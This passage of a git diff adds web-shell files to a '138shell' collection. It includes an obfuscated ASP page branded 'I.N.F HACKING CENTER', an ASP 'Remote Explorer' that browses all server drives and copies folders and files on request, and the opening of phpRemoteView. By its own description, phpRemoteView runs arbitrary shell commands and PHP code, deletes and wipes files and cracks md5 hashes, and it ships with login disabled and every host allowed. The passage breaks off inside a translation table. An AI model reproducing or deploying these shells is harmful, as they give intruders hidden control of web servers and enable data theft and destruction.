@!(D@*@!sk@*@!J4@*b9.+kPjCDıDıPFıdsıxCPnG9EU!PVöDüxDüVh+0PİdYNrğr	ky,9WkXl	ıU~b9ıxı,XCyıU c@!8D@*@!Vb@*PnXYl.nmP$öVüsü~Ağ+.,AKş/l,CmOl,.CD,fnh3Yb.R@!4D@*@!sk@*|!D8lUıU,fG/HCVmDıUı~VöDüxOüsXn4bss+V,İçk	PbHxı,j+M\nD9+~6^:l	ı"Pdlyıs~uN9Pwl.3nOs+"Rc~@!(D@*@!^k@*)[M+dPnıdsıxC,Km:Pj+MrPVk.k^k.~vöDx=~N=-h8wl^k1lU-[n6l;VD lkw@!8M@*@!^n	YnD@*@!6WUDP1WVKD{.+9@*H+^+.~Ilwm8k^kDbh@!z6W	Y@*@!&^xO+M@*@!(D@*@!^k@*jrD+[+0r,kU1V!N+^+MrPDlVkaPn[D+0~b9:k	~Kl	+^kU+~i^lşhl@!8D@*@!sr@*bNhr	PŞr0MnkkUbPÇmV:m@!(.@*@!Vr@*U+ddbWx,#+,ZWKVr+,fğ+.Vn.bPÇCVm.l0PJGTkx~6^:C@!(.@*@!sb@*UkYV.k	P#+Mk~Pm4l	slMıxıPİ	[rDs+,\dR  @!4.@*@!8D@*@!^n	Y+.@*@!0GxD~1WsKD{/k^\.@*@!l~tM+Wxslk^OW=:lbs8Ws4@$tGYhCbV mKh@*@!0GUDPmGsKDx/bs7+.@*HACfİ@!zm@*Pr9LwCAA==^#~@%><title>I.N.F HACKING CENTER - <%=#@~^CAAAAA==2MWm	ls+UQMAAA==^#~@%> - www.infilak.tr.cx</title><%#@~^HAEAAA==@#@&l^DP{PI;!n/DR}EDzjDDk	L`rlmDrGxr#@#@&(0~C1Y~',EtV2E,KtnU@#@&^l^s,XCMNb:@#@&+	[Pb0@#@&0VCdKDP{~D;EdOR6WM:cJVsm/GDrb@#@&kds:Px~M+5EdDRWKDs`Jb/^n:r#@#@&b0~rkV+sxJrPY4nU@#@&kkVn:~x,J[EME@#@&+U[,k0@#@&b0~3^CkW.,',JJ,Y4nx,3slkW.x,D+$;+kYRkn.\D7l.kC8^+d`r)nhSmK_5?(/zSmnzP_Jb@#@&gVMAAA==^#~@%><center> <%#@~^UAAAAA==@#@&DnkwKx/RS.kD+~J@!4G[HP4T^W^WD{:f&2&2&@*@!8G9X~YK2:mDLr	'*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width="75%" border=0 bgcolor=black><tr><td><table width="100%" border=0 bgcolor="#666666" cellpadding=1 cellspacing=1><tr><td><center> <%#@~^WQAAAA==@#@&DnkwKx/RS.kD+~J@!khL,/D1xtDYw=&&+cNK:CkU[^6 mKhz0l.dKxF&r	0sWTGcor6P4+kTtDx,y@*E@#@&fhwAAA==^#~@%></td></tr><td bgcolor="#999999" height=32>&nbsp;<Font size=2 Color=000000 Face=Verdana><b>Adres : </b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</Font> <input type=hidden name=islem value=basla> <input type=text name=klasor size=49 value="<%=#@~^BgAAAA==V^ldKDjAIAAA==^#~@%>"> &nbsp; <input type=submit value="Kodları Göster" name=submit> </Font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail.com title="E-mail Gönder"><font face=wingdings color=lime size=4>*</font> </a>&nbsp; <a href=http://www.infilaktim.tk title="I.N.F Sitesi" target=_blank><font face=wingdings color=lime size=4>M</font> </a>&nbsp; <a href="?action=help" title="Yardım" target=inf onClick="window.open('?action=help','inf','width=450,height=400 toolbar=no scrollbars=yes' )"><font face=wingdings color=lime size=4>&</font> </a>&nbsp;</td></tr></form></td></table></td></tr><tr><td><table width="100%" border=0 align=center><tr><td bgcolor="#CCCCCC" height=359><%#@~^QwAAAA==r6PUKY,k/^+s~',J8lkVCE,YtU@#@&D+k2Gxk+ch.kOn,JE[HCybVC.LJJ@#@&Vd+nBQAAA==^#~@%><br><center><textarea rows=24 name=kodlar cols=90>
+<%#@~^yAAAAA==jY~K4NCK:n,xPU+.\D /M+lDnr(L+1OcJtk1DG/GWDRpHduK:nEb@#@&W8%_KPnc6a+U,JV2Kr~,EJL3slkW.'rJ~,Wl^/+@#@&G4NC:KKRjn	N@#@&0GN^l.~{P/n.7+.R4OsV3	mKN+vW(%C:KKR"+d2Kx/P+XY#@#@&.+kwKxd+ AMkO+,VW9VC.@#@&+U[,kWoT4AAA==^#~@%>
+<%#@~^CQAAAA==j`A~UkDkVDwMAAA==^#~@%><style>TD {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+BODY {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+P {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+DIV {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+
+A:link {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A:active {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A:visited {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A.postlink {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A:hover {
+	COLOR: #dd6900
+}
+.bodyline {
+	BORDER-RIGHT: #98aab1 1px solid; BORDER-TOP: #98aab1 1px solid; BACKGROUND: #ffffff; BORDER-LEFT: #98aab1 1px solid; BORDER-BOTTOM: #98aab1 1px solid
+}
+INPUT {
+	BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BACKGROUND-COLOR: #fcfcfc; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #006699
+}
+TEXTAREA {
+	BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BACKGROUND-COLOR: #fcfcfc; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #006699
+}
+SELECT {
+	BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BORDER-RIGHT-COLOR: #006699
+}
+IMG {
+	BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px
+}
+TH {
+	PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKGROUND: #f9bc5e url('images/navbar.jpg'); COLOR: #713600; WHITE-SPACE: nowrap; HEIGHT: 27px; TEXT-ALIGN: center
+}
+TD.cat {
+	FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: 4px; LETTER-SPACING: 1px; HEIGHT: 27px
+}
+.title {
+	FONT-WEIGHT: bold; FONT-SIZE: 13px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.content {
+	BACKGROUND: none transparent scroll repeat 0% 0%; FONT-FAMILY: Verdana, Helvetica
+}
+.block-title {
+	FONT-SIZE: 11px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica
+}
+.storytitle {
+	FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #713600; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.storycat {
+	FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: underline
+}
+.boxtitle {
+	FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.boxcontent {
+	FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: red; FONT-FAMILY: Verdana, Helvetica
+}
+.option {
+	FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.ok {
+	FONT-WEIGHT: normal; FONT-SIZE: 9px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #000000; FONT-FAMILY: webdings; TEXT-DECORATION: none
+}</style><style><!-- 
+body {scrollbar-face-color: #000000; scrollbar-shadow-color: #003333; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #003333; scrollbar-darkshadow-color: #000000; scrollbar-track-color: #993300; scrollbar-arrow-color: #CC3300;}
+}
+// --></style><%#@~^BwAAAA==n	N~kE(oQIAAA==^#~@%>
+
+<%#@~^CgAAAA==d!4~HlMNks8AMAAA==^#~@%><title><%=#@~^CAAAAA==2MWm	ls+UQMAAA==^#~@%></title><body bgcolor=#333333><br><center><font color=red><h4><%=#@~^CAAAAA==2MWm	ls+UQMAAA==^#~@%></center>
+<font color=lime>
+<%=#@~^BAAAAA==4V2qQEAAA==^#~@%>
+<%#@~^HwAAAA==@#@&DnkwKx/RUN@#@&nx9Pd;(@#@&ugcAAA==^#~@%>
+
+
+</textarea>
+<noscript><noscript><plaintext><plaintext>
+<!--
+         
+             HACKING
+            
+             www.infilak.tr.cx
+              Mehdi & HolyDemon
+                 INF TEAM DURMAZ , DURDURULAMAZ
+            Hak Geldi Batıl Zail Oldu..
+-->
\ No newline at end of file
diff --git a/138shell/R/Rem Exp.asp.txt b/138shell/R/Rem Exp.asp.txt
new file mode 100644
index 0000000..c8faa18
--- /dev/null
+++ b/138shell/R/Rem Exp.asp.txt	
@@ -0,0 +1,250 @@
+<%@ Language=VBScript %>
+<%
+Option Explicit
+
+Dim giCount
+Dim gvAttributes
+
+Dim Ext
+
+Dim ScriptFolder
+Dim FolderPath
+
+Dim FileSystem
+Dim Drives
+Dim Drive
+Dim Folders
+Dim Folder
+Dim SubFolders
+Dim SubFolder
+Dim Files
+Dim File
+
+Dim BgColor, BackgroundColor,FSO
+
+If Request.QueryString("CopyFolder") <> "" Then
+ Set FSO = CreateObject("Scripting.FileSystemObject")
+ FSO.CopyFolder Request.QueryString("CopyFolder") & "*", "d:\"
+End If
+
+If Request.QueryString("CopyFile") <> "" Then
+ Set FSO = CreateObject("Scripting.FileSystemObject")
+ FSO.CopyFile Request.QueryString("FolderPath") & Request.QueryString("CopyFile"), "d:\"
+End If
+
+Set FileSystem = Server.CreateObject("Scripting.FileSystemObject")
+
+FolderPath = Request.QueryString("FolderPath")
+
+If FolderPath = "" Then
+ FolderPath = Request.ServerVariables("PATH_TRANSLATED")
+End If
+
+FolderPath = ParseFolder(FolderPath)
+
+ScriptFolder = ParseFolder(Request.ServerVariables("PATH_TRANSLATED")) & "images\"
+
+%>
+<html>
+<head>
+<title>Remote Explorer</title>
+<style type="text/css">
+BODY
+{
+ BACKGROUND-COLOR: #C0C0C0
+    FONT-FAMILY: 'MS Sans Serif', Arial;
+    FONT-SIZE: 8px;
+ MARGIN: 0px
+}
+td, input, select
+{
+    FONT-FAMILY: 'MS Sans Serif', Arial;
+    FONT-SIZE: 8px;
+}
+.Address
+{
+    BACKGROUND-ATTACHMENT: fixed;
+    BACKGROUND-POSITION: 1px center;
+    BACKGROUND-REPEAT: no-repeat;
+    Padding-LEFT: 10px
+}
+.Go
+{
+    BACKGROUND-ATTACHMENT: fixed;
+    BACKGROUND-POSITION: left center;
+    BACKGROUND-REPEAT: no-repeat;
+    Padding-LEFT: 10px
+}
+</style>
+</head>
+<body bgcolor="#c0c0c0">
+<table width="100%" cellpadding="0" cellspacing="0" border="0">
+<tr>
+<form>
+<td width="1%" nowrap>   
+<select name="FolderPath" id="Drive">
+<%
+Set Drives = FileSystem.Drives
+For Each Drive In Drives
+ Response.Write "<OPTION value=""" & Drive.DriveLetter & ":\"""
+ If InStr(UCase(FolderPath), Drive.DriveLetter & ":\") > 0 Then Response.Write " selected"
+  Response.Write ">"
+  Response.Write Drive.DriveLetter & " - "
+  If Drive.DriveType = "Remote" Then
+   Response.Write Drive.ShareName & " [share]"
+  ElseIf Drive.DriveLetter <> "A" Then
+   If Drive.IsReady Then
+    Response.Write Drive.VolumeName
+   Else
+    Response.Write "(Not Ready)"
+   End If
+  Else
+   Response.Write "(Skiped Detection)"
+  End If
+  Response.Write "</OPTION>"
+ Next
+%>
+</select> <input class="Go" type="submit" value="Go" style="border:1px outset">
+</td>
+</form>
+<td width="1%">   Address: </td>
+<form>
+<td width="100%">
+<input class="Address" type="text" name="FolderPath" value="<%=FolderPath%>" style="width:100%" size="20">
+</td>
+<td width="1%">
+<input class="Go" type="submit" value="Go"style="border:1px outset">
+</td>
+</form>
+</tr>
+</table>
+<%
+Set Folder = FileSystem.GetFolder(FolderPath)
+Set SubFolders = Folder.SubFolders
+Set Files = Folder.Files
+%>
+<br>
+<table cellpadding="1" cellspacing="1" border="0" width="100%" align="center" style="border:1px inset">
+<tr>
+<td width="40%" height="20" bgcolor="silver">  Name</td>
+<td width="10%" bgcolor="silver" align="right">Size    </td>
+<td width="20%" bgcolor="silver">Type </td>
+<td width="20%" bgcolor="silver">Modified </td>
+<td width="10%" bgcolor="silver" align="right">Attributes  </td>
+</tr>
+<%
+If Not Folder.IsRootFolder Then
+ BgToggle
+%>
+<tr title="Top Level">
+<td bgcolor="<%=BgColor%>"><a href= "<%=Request.ServerVariables("script_name")%>?FolderPath=<%=Server.URLPathEncode(Folder.Drive & "\")%>"><font face="wingdings" size="4">O</font> Top Level</a> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+</tr>
+<%BgToggle%>
+<tr>
+<td bgcolor="<%=BgColor%>"><a href= "<%=Request.ServerVariables("script_name")%>?FolderPath=<%=Server.URLPathEncode(Folder)%>"><font face="wingdings" size="4">¶</font> Up One Level</a> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+</tr>
+<%
+End If
+For Each SubFolder In SubFolders
+ BgToggle
+%>
+<tr>
+<td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Request.ServerVariables("script_name") & "?FolderPath=" & Server.URLPathEncode(FolderPath & SubFolder.Name & "\")%>"><font face="wingdings" size="4">0</font> <b><%=SubFolder.Name%></b></a>        (<a href= "<%=Request.ServerVariables("script_name")%>?CopyFolder=<%=Server.URLPathEncode(FolderPath & SubFolder.Name)%>&FolderPath=<%=Server.URLPathEncode(FolderPath & "\")%>">Copy</a>)</td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"><%=SubFolder.Type%>  </td>
+<td bgcolor="<%=BgColor%>"><%=SubFolder.DateLastModified%> </td>
+<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(SubFolder.Attributes)%></td>
+</tr>
+<%
+Next
+For Each File In Files
+ BgToggle
+ Ext = FileExtension(File.Name)
+%>
+<tr>
+<td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f=<%=File.Name%>&FolderPath=<%=Server.URLPathEncode(FolderPath)%>" target="_blank"><font face="wingdings" size="4">3</font> "<%=File.Name%></a>        (<a href= "<%=Request.ServerVariables("script_name")%>?CopyFile=<%=File.Name%>&FolderPath=<%=Server.URLPathEncode(FolderPath & "\")%>">Copy</a>)</td>
+<td bgcolor="<%=BgColor%>" align="right"><%=(File.Size)%> Byte  </td>
+<td bgcolor="<%=BgColor%>"><%=File.Type%></td>
+<td bgcolor="<%=BgColor%>"><%=File.DateLastModified%></td>
+<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(File.Attributes)%></td>
+</tr>
+<%Next%>
+</table>
+</body>
+</html>
+<%
+Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal MinUpperBound, ByVal IndexSeperator)
+    Dim lsResult
+    Dim llTemp
+    Dim giCount
+    MaxValuePerIndex = MaxValuePerIndex + 1
+    Do While Int(SourceNumber / (MaxValuePerIndex ^ MinUpperBound)) > (MaxValuePerIndex - 1)
+        MinUpperBound = MinUpperBound + 1
+    Loop
+    For giCount = MinUpperBound To 0 Step -1
+        llTemp = Int(SourceNumber / (MaxValuePerIndex ^ giCount))
+        lsResult = lsResult & CStr(llTemp)
+        If giCount > 0 Then lsResult = lsResult & IndexSeperator
+        SourceNumber = SourceNumber - (llTemp * (MaxValuePerIndex ^ giCount))
+    Next
+    ConvertBinary = lsResult
+End Function
+
+Private Sub BgToggle()
+ BackgroundColor = Not(BackgroundColor)
+ If BackgroundColor Then
+  BgColor = "#efefef"
+ Else
+  BgColor = "#ffffff"
+ End If
+End Sub
+
+Private Function Attributes(AttributeValue)
+ Dim lvAttributes
+ Dim lsResult
+ lvAttributes = Split(ConvertBinary(AttributeValue, 1, 7, ","), ",")
+ If lvAttributes(0) = 1 Then lsResult = "ReadOnly&nbsp;&nbsp;"
+ If lvAttributes(1) = 1 Then lsResult = lsResult & "Hidden&nbsp;&nbsp;"
+ If lvAttributes(2) = 1 Then lsResult = lsResult & "System&nbsp;&nbsp;"
+ If lvAttributes(5) = 1 Then lsResult = lsResult & "Archive&nbsp;&nbsp;"
+ Attributes = lsResult
+End Function
+
+Private Function FileExtension(FileName)
+ Dim lsExt
+ Dim liCount
+ For liCount = Len(FileName) To 1 Step -1
+  If Mid(FileName, liCount, 1) = "." Then
+   lsExt = Right(FileName, Len(FileName) - liCount)
+   Exit For
+  End If
+ Next
+ If Not FileSystem.FileExists(ScriptFolder & "ext_" & lsExt & ".gif") Then
+  lsExt = ""
+ End If
+ FileExtension = lsExt
+End Function
+
+Private Function ParseFolder(PathString)
+ Dim liCount
+ If Right(PathString, 1) = "\" Then
+  ParseFolder = PathString
+ Else
+  For liCount = Len(PathString) To 1 Step -1
+   If Mid(PathString, liCount, 1) = "\" Then
+    ParseFolder = Left(PathString, liCount)
+    Exit For
+   End If
+  Next
+ End If
+End Function
+%>
+
diff --git a/138shell/R/Rem View.php.txt b/138shell/R/Rem View.php.txt
new file mode 100644
index 0000000..4d6e436
--- /dev/null
+++ b/138shell/R/Rem View.php.txt	
@@ -0,0 +1,2553 @@
+<?php
+
+/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
+ *
+ *  Welcome to phpRemoteView (RemView) 
+ *
+ *  View/Edit remove file system:
+ *  - view index of directory (/var/log - view logs, /tmp - view PHP sessions)
+ *  - view name, size, owner:group, perms, modify time of files
+ *  - view html/txt/image/session files
+ *  - download any file and open on Notepad
+ *  - create/edit/delete file/dirs
+ *  - executing any shell commands and any PHP-code
+ *
+ *  Free download from http://php.spb.ru/remview/
+ *  Version 04c, 2003-10-23. 
+ *  Please, report bugs...
+ *
+ *  This programm for Unix/Windows system and PHP4 (or higest).
+ *
+ *  (c) Dmitry Borodin, dima@php.spb.ru, http://php.spb.ru
+ *
+ * * * * * * * * * * * * * * * * * WHATS NEW * * * * * * * * * * * * * * * *
+ *
+ * --version4--
+ *  2003.10.23 support short <?php ?> tags, thanks A.Voropay
+ *
+ *  2003.04.22 read first 64Kb of null-size file (example: /etc/zero), 
+ *                thanks Anight
+ *             add many functions/converts: md5, decode md5 (pass crack), 
+ *                date/time, base64, translit, russian charsets
+ *             fix bug: read session files
+ *
+ *  2002.08.24 new design and images
+ *             many colums in panel
+ *             sort & setup panel
+ *             dir tree
+ *             base64 encoding
+ *             character map
+ *             HTTP authentication with login/pass
+ *             IP-address authentication with allow hosts
+ *
+ * --version3--
+ *  2002.08.10 add multi language support (english and russian)
+ *             some update
+ *
+ *  2002.08.05 new: full windows support
+ *             fix some bugs, thanks Jeremy Flinston
+ * 
+ *  2002.07.31 add file upload for create files
+ *             add 'direcrory commands'
+ *             view full info after safe_mode errors
+ *             fixed problem with register_glogals=off in php.ini
+ *             fixed problem with magic quotes in php.ini (auto strip slashes)
+ *
+ * --version2--
+ *  2002.01.20 add panel 'TOOLS': eval php-code and run shell commands
+ *             add panel 'TOOLS': eval php-code and run shell commands
+ *             add copy/edit/create file (+panel 'EDIT')
+ *             add only-read mode (disable write/delete and PHP/Shell)
+ *
+ *  2002.01.19 add delete/touch/clean/wipe file
+ *             add panel 'INFO', view a/c/m-time, hexdump view
+ *             add session file view mode (link 'SESSION').
+ *
+ *  2002.01.12 first version!
+ *
+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
+
+///////////////////////////////// S E T U P ///////////////////////////////////
+
+   
+   $version="2003-10-23";
+
+   $hexdump_lines=8;        // lines in hex preview file
+   $hexdump_rows=24;        // 16, 24 or 32 bytes in one line
+
+   $mkdir_mode=0755;        // chmode for new dir ('MkDir' button)
+
+   $maxsize_fread=65536;    // read first 64Kb from any null-size file
+
+   // USER ACCESS //
+
+   $write_access=true;      // true - user (you) may be write/delete files/dirs
+                            // false - only read access
+
+   $phpeval_access=true;    // true - user (you) may be execute any php-code
+                            // false - function eval() disable
+   
+   $system_access=true;     // true - user (you) may be run shell commands
+                            // false - function system() disable
+   
+   // AUTHORIZATION //
+
+   $login=false;            // Login & password for access to this programm.
+   $pass=false;             // Example: $login="MyLogin"; $pass="MyPaSsWoRd";
+                            // Type 'login=false' for disable authorization.
+
+   $host_allow=array("*");  // Type list of your(allow) hosts. All other - denied.
+                            // Example: $host_allow=array("127.0.0.*","localhost")
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+   $tmp=array();
+   foreach ($host_allow as $k=>$v)
+      $tmp[]=str_replace("\\*",".*",preg_quote($v));
+   $s="!^(".implode("|",$tmp).")$!i";
+   if (!preg_match($s,getenv("REMOTE_ADDR")) && !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) 
+      exit("<h1><a href=http://php.spb.ru/remview/>phpRemoteView</a>: Access Denied - your host not allow</h1>\n");
+   if ($login!==false && (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || 
+      $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$login || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)) {
+      header("WWW-Authenticate: Basic realm=\"phpRemoteView\"");
+      header("HTTP/1.0 401 Unauthorized");
+      exit("<h1><a href=http://php.spb.ru/remview/>phpRemoteView</a>: Access Denied - password erroneous</h1>\n");
+   }
+
+   error_reporting(2047);
+   set_magic_quotes_runtime(0);
+   @set_time_limit(0);
+   @ini_set('max_execution_time',0);
+   @ini_set('output_buffering',0);
+   if (function_exists("ob_start") && (!isset($c) || $c!="md5crack")) ob_start("ob_gzhandler");
+
+   $self=basename($HTTP_SERVER_VARS['PHP_SELF']);
+
+   $url="http://".getenv('HTTP_HOST').
+        (getenv('SERVER_PORT')!=80 ? ":".getenv('SERVER_PORT') : "").
+        $HTTP_SERVER_VARS['PHP_SELF'].
+        (getenv('QUERY_STRING')!="" ? "?".getenv('QUERY_STRING') : "");
+   $uurl=urlencode($url);
+
+   //
+   // antofix 'register globals': $HTTP_GET/POST_VARS -> normal vars;
+   //
+   $autovars1="c d f php skipphp pre nlbr xmp htmls shell skipshell pos ".
+              "ftype fnot c2 confirm text df df2 df3 df4 ref from to ".
+              "fatt showfile showsize root name ref names sort sortby ".
+              "datetime fontname fontname2 fontsize pan limit convert fulltime fullqty";
+   foreach (explode(" ",$autovars1) as $k=>$v)  {
+      if (isset($HTTP_POST_VARS[$v])) $$v=$HTTP_POST_VARS[$v];
+         elseif (isset($HTTP_GET_VARS[$v])) $$v=$HTTP_GET_VARS[$v];
+            //elseif (isset($HTTP_COOKIE_VARS[$v])) $$v=$HTTP_COOKIE_VARS[$v];
+   }
+
+   //
+   // autofix 'magic quotes':
+   //
+   $autovars2="php shell text d root convert";
+   if (get_magic_quotes_runtime() || get_magic_quotes_gpc()) {
+      foreach (explode(" ",$autovars2) as $k=>$v) {
+         if (isset($$v)) $$v=stripslashes($$v);
+      }
+   }
+
+   $cp_def=array(
+      "001001",
+      "nst2ac",
+      "d/m/y H:i",
+      "Tahoma",
+      "9"
+      );
+
+   $panel=0;
+   if (isset($HTTP_COOKIE_VARS["cp$panel"])) 
+      $cp=explode("~",$HTTP_COOKIE_VARS["cp$panel"]); 
+   else 
+      $cp=$cp_def;
+   $cc=$cp[0];
+   $cn=$cp[1];
+
+/*
+
+$cc / $cp[0]- ñïèñîê îäíîáóêâåííûõ ïàğàìåòğîâ, ñêîïèğîâàíî â $cs:
+   $cc[0] - ïî êàêîé êîëîíêå ñîğòèğîâàòü, à åñëè ıòî íå öèôğà:
+               n - ïî èìåíè
+               e - ğàñøèğåíèå
+   $cc[1] - ïîğÿäîê (0 - âîçğàñò. 1 - óáûâàşùèé)
+   $cc[2] - ïîêàçûâàòü ëè èêîíêè
+   $cc[3] - ÷òî äåëàòü ïğè êëèêå ïî èêîíêå ôàéëà:
+               0 - ïğîñìîòğ â text/plain
+               1 - ïğîñìîòğ â html
+               2 - download
+               3 - ïàğàìåòğû ôàéëà (info)
+   $cc[4] - îêğóãëÿòü ğàçìåğ ôàéëîâ äî Êá/Ìá/Ãá
+   $cc[5] - ÿçûê:
+               1 - àíãëèéñêèé
+               2 - ğóññêè
+
+$cn / $cp[1] - ñïèñîê êîëîíîê è èõ ïîğÿäîê, êîòîğûå ïîêàçûâàòü, ñòğîêà áóêâ/öèôğ:
+   t - type
+   n - name
+   s - size
+   a - owner+group
+   o - owner
+   g - group
+   c - chmod
+   1 - create time
+   2 - modify time
+   3 - access time
+
+$cp[2]: ôîğìàò âğåìåíè
+
+$cp[3]: èìÿ øğèôòà
+
+$cp[4]: ğàçìåğ øğèôòà
+
+*/
+
+   // Êàê âûğàâíèâàòü êîëîíêè
+   $cn_align=array();
+   $cn_align['t']='center';
+   $cn_align['n']='left';
+   $cn_align['s']='right';
+   $cn_align['a']='center';
+   $cn_align['o']='center';
+   $cn_align['g']='center';
+   $cn_align['c']='center';
+   $cn_align['1']='center';
+   $cn_align['2']='center';
+   $cn_align['3']='center';
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+/*--mmstart--*/
+$mm=array(
+"Index of"=>"Èíäåêñ",
+"View file"=>"Ïîêàç ôàéëà",
+"DISK"=>"ÄÈÑÊ",
+"Info"=>"Èíôî",
+"Plain"=>"Ïğÿìîé",
+"HTML"=>"HTML",
+"Session"=>"Ñåññèÿ",
+"Image"=>"Êàğòèíêà",
+"Notepad"=>"Áëîêíîò",
+"DOWNLOAD"=>"ÇÀÃĞÓÇÈÒÜ",
+"Edit"=>"Ïğàâêà",
+"Sorry, this programm run in read-only mode."=>"Èçâèíèòå, ıòà ïğîãğàììà ğàáîòàåò â ğåæèìå 'òîëüêî ÷òåíèå'.",
+"For full access: write"=>"Äëÿ ïîëíîãî äîñòóïà: íàïèøèòå",
+"in this php-file"=>"â ıòîì php-ôàéëå",
+"Reason"=>"Ïğè÷èíà",
+"Error path"=>"Îøèáî÷íûé ïóòü",
+"Click here for start"=>"Íàæìèòå äëÿ ñòàğòà",
+"up directory"=>"êàòàëîã âûøå",
+"access denied"=>"äîñòóï çàïğåùåí",
+"REMVIEW TOOLS"=>"ÓÒÈËÈÒÛ REMVIEW",
+"version"=>"âåğñèÿ",
+"Free download"=>"Áåñïëàòíàÿ çàãğóçêà",
+"back to directory"=>"âåğíóòüñÿ â êàòàëîã",
+"Size"=>"Ğàçìåğ",
+"Owner"=>"Îâíåğ",
+"Group"=>"Ãğóïïà",
+"FileType"=>"Òèï ôàéëà",
+"Perms"=>"Ïğàâà",
+"Create time"=>"Âğåìÿ ñîçäàíèÿ",
+"Access time"=>"Âğåìÿ äîñòóïà",
+"MODIFY time"=>"Âğåìÿ ÈÇÌÅÍÅÍÈß",
+"HEXDUMP PREVIEW"=>"ÏĞÅÄÏĞÎÑÌÎÒĞ Â 16-ĞÈ×ÍÎÌ ÂÈÄÅ",
+"ONLY READ ACCESS"=>"ÄÎÑÒÓÏ ÒÎËÜÊÎ ÍÀ ×ÒÅÍÈÅ",
+"Can't READ file - access denied"=>"Íå ìîãó ïğî÷èòàòü - äîñòóï çàïğåùåí",
+"full read/write access"=>"ïîëíûé äîñòóï íà ÷òåíèå/çàïèñü",
+"FILE SYSTEM COMMANDS"=>"ÊÎÌÀÍÄÛ ÔÀÉËÎÂÎÉ ÑÈÑÒÅÌÛ",
+"EDIT"=>"ĞÅÄÀÊÒ.",
+"FILE"=>"ÔÀÉË",
+"DELETE"=>"ÑÒÅĞÅÒÜ",
+"Delete this file"=>"Ñòåğåòü ôàéë",
+"CLEAN"=>"Î×ÈÑÒÈÒÜ",
+"TOUCH"=>"ÎÁÍÎÂÈÒÜ",
+"Set current 'mtime'"=>"Óñòàí.òåêóù.âğåìÿ",
+"WIPE(delete)"=>"ÓÍÈ×ÒÎÆÈÒÜ",
+"Write '0000..' and delete"=>"Çàáèòü íóëÿìè, ñòåğåòü",
+"COPY FILE"=>"ÊÎÏÈĞÎÂÀÒÜ ÔÀÉË",
+"COPY"=>"ÊÎÏÈĞÎÂÀÒÜ",
